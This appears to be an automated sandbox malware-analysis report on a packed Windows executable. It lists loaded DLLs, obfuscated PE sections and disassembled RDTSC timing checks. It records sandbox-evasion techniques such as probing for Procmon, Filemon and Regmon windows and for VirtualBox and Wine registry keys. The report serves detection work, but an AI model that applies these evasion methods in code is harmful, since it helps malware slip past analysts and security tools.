Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: file.exe | Static file information: File size 2964992 > 1048576
Source: file.exe | Static PE information: Raw size of pbzdrecb is bigger than: 0x100000 < 0x2a8800

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.fd0000.0.unpack :EW;.rsrc :W;.idata :W;pbzdrecb:EW;nwxoinbz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;pbzdrecb:EW;nwxoinbz:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x2e3aae should be: 0x2deec3
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: pbzdrecb
Source: file.exe | Static PE information: section name: nwxoinbz
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0149775F push cs; iretd 0_3_01497760
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0148C72D push ebx; ret 0_3_0148C75F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0148B7AC push ebx; ret 0_3_0148B7CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_014978A7 push ds; retf 0_3_014978A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_014DC4D0 push cs; retf 0_3_014DC4DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_014DC4F9 push cs; iretd 0_3_014DC4FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_014DC499 push cs; ret 0_3_014DC49A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_014DCBA4 push es; retf 0_3_014DCBBB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_014714FF push ds; retf 0_3_01471500
Source: file.exe | Static PE information: section name: entropy: 7.971219963000856

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D66C5 second address: 11D6748 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFAC79DCCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007EFFAC79DCD7h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007EFFAC79DCC8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007EFFAC79DCC8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a sub dword ptr [ebp+122D33A2h], eax 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6748 second address: 11D6753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFFACBF2F86h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A61 second address: 11D7A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A65 second address: 11D7A7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A7E second address: 11D7A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8E5A second address: 11D8E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F93h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7A92 second address: 11D7AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCD1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D97F7 second address: 11D97FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D97FE second address: 11D982C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c mov si, C8CCh 0x00000010 call 00007EFFAC79DCD0h 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007EFFAC79DCCCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D982C second address: 11D9830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9830 second address: 11D9851 instructions: 0x00000000 rdtsc 0x00000002 je 00007EFFAC79DCC8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007EFFAC79DCD0h 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9851 second address: 11D9857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA328 second address: 11DA32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DA32E second address: 11DA3B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFACBF2F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007EFFACBF2F88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D1F50h] 0x0000002d push 00000000h 0x0000002f mov edi, 2294E5A2h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007EFFACBF2F88h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 mov esi, dword ptr [ebp+122D27FEh] 0x00000056 mov dword ptr [ebp+122D23A6h], eax 0x0000005c xchg eax, ebx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007EFFACBF2F90h 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DB881 second address: 11DB885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DB885 second address: 11DB8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007EFFACBF2F8Fh 0x0000000e push esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 popad 0x00000013 nop 0x00000014 mov si, 624Eh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007EFFACBF2F88h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jo 00007EFFACBF2F8Eh 0x0000003a push edx 0x0000003b mov esi, dword ptr [ebp+122D2CE7h] 0x00000041 pop esi 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push eax 0x00000049 pop eax 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD85A second address: 11DD891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007EFFAC79DCCAh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007EFFAC79DCCAh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFFAC79DCD6h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD891 second address: 11DD897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD897 second address: 11DD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007EFFAC79DCC6h 0x00000012 jne 00007EFFAC79DCC6h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD8B0 second address: 11DD8C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007EFFACBF2F8Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DB643 second address: 11DB647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFE5B second address: 11DFE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFE5F second address: 11DFE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E0F09 second address: 11E0F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5022 second address: 11E5028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5028 second address: 11E5090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F95h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 jp 00007EFFACBF2FB5h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007EFFACBF2F8Dh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5090 second address: 11E5094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3166 second address: 11E316C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E316C second address: 11E3172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3172 second address: 11E318E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007EFFACBF2F91h 0x00000011 jmp 00007EFFACBF2F8Bh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5835 second address: 11E583B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E77D6 second address: 11E783E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+12446C37h], eax 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+1245BEBFh], ecx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007EFFACBF2F88h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007EFFACBF2F97h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8A13 second address: 11E8A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB93A second address: 11EB96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D1BE0h] 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D2BE7h] 0x00000017 push 00000000h 0x00000019 jns 00007EFFACBF2F95h 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB96F second address: 11EB989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECAA0 second address: 11ECAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBC3F second address: 11EBC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EBC4A second address: 11EBC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ECBCC second address: 11ECBF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007EFFAC79DCD2h 0x00000010 je 00007EFFAC79DCCCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDB9B second address: 11EDB9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC5F second address: 11EDC65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EDC65 second address: 11EDC6F instructions: 0x00000000 rdtsc 0x00000002 je 00007EFFACBF2F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F4191 second address: 11F419A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2254 second address: 11F2258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7C82 second address: 11F7C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7C9E second address: 11F7CAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7CAC second address: 11F7CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9273 second address: 11F9277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD8C3 second address: 11FD8F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFFAC79DCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push edx 0x0000000c jmp 00007EFFAC79DCCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007EFFAC79DCD6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118DDB3 second address: 118DDB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202929 second address: 120294F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007EFFAC79DCD9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120294F second address: 120296E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFFACBF2F8Dh 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120296E second address: 1202972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202972 second address: 1202987 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202987 second address: 12029AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007EFFAC79DCD8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12029AE second address: 12029B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1202AC9 second address: 1202AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B44A second address: 119B454 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFFACBF2F8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119B454 second address: 119B45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207DCB second address: 1207E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFFACBF2F86h 0x0000000a jg 00007EFFACBF2F86h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007EFFACBF2F8Ah 0x00000017 jmp 00007EFFACBF2F94h 0x0000001c je 00007EFFACBF2F86h 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208226 second address: 1208243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007EFFAC79DCCEh 0x0000000a pushad 0x0000000b je 00007EFFAC79DCC6h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208243 second address: 120824D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120824D second address: 1208256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208256 second address: 120825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D243D second address: 11BAA14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007EFFAC79DCC6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 movzx edx, dx 0x0000001a lea eax, dword ptr [ebp+124771FDh] 0x00000020 mov dl, cl 0x00000022 push eax 0x00000023 pushad 0x00000024 jmp 00007EFFAC79DCD7h 0x00000029 push edx 0x0000002a push edx 0x0000002b pop edx 0x0000002c pop edx 0x0000002d popad 0x0000002e mov dword ptr [esp], eax 0x00000031 adc dx, 056Eh 0x00000036 call dword ptr [ebp+122D23F1h] 0x0000003c jmp 00007EFFAC79DCD3h 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 jo 00007EFFAC79DCC6h 0x0000004a pushad 0x0000004b popad 0x0000004c pop ebx 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D254D second address: 11D2553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2553 second address: 11D2557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2557 second address: 11D255B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
